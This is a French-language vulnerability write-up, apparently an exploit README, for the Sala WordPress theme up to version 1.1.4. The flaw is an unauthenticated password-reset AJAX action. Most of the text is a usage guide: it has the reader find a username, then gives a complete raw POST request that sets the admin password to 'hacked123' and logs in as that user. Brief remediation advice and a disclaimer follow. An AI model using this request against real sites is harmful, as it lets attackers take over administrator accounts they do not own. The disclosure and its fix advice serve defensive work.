
Sala - Thème WordPress pour Startup & SaaS <= 1.1.4 - Escalade de privilèges non authentifiée via réinitialisation de mot de passe / prise de contrôle de compte
🔥 Résumé de la vulnérabilité
Le thème WordPress Sala versions <= 1.1.4 est vulnérable à une escalade de privilèges non authentifiée. Cette faille permet à des attaquants non authentifiés de réinitialiser les mots de passe d'utilisateurs arbitraires — y compris les administrateurs — en invoquant directement un point de terminaison AJAX exposé sans vérifier l'identité du demandeur.
Cette vulnérabilité provient de la fonction change_password_ajax enregistrée via wp_ajax_nopriv_, qui définit un nouveau mot de passe pour tout nom d'utilisateur valide sans vérifier si la requête est autorisée.
🔍 Thème concerné
🧪 Caractéristiques de l'exploit
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 Chercheur
🚀 Utilisation
Identifiez un nom d'utilisateur valide sur le site WordPress cible. Vous pouvez le faire en vérifiant :
/author/username)Construisez la requête POST suivante pour réinitialiser le mot de passe de l'utilisateur :
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
En cas de succès, vous pouvez maintenant vous connecter en tant qu'utilisateur ciblé en utilisant le nouveau mot de passe (hacked123 dans l'exemple ci-dessus).
Rendez-vous sur /wp-login.php et vérifiez l'accès.
🛠 Recommandations de correction
wp_ajax_nopriv_change_password_ajax.is_user_logged_in() et l'identité de l'utilisateur avant d'autoriser des actions sensibles.🔒 Avertissement :
Ces informations sont fournies à des fins éducatives et de tests de pénétration autorisés uniquement. L'exploitation non autorisée de systèmes est illégale et contraire à l'éthique.
📚 Référence :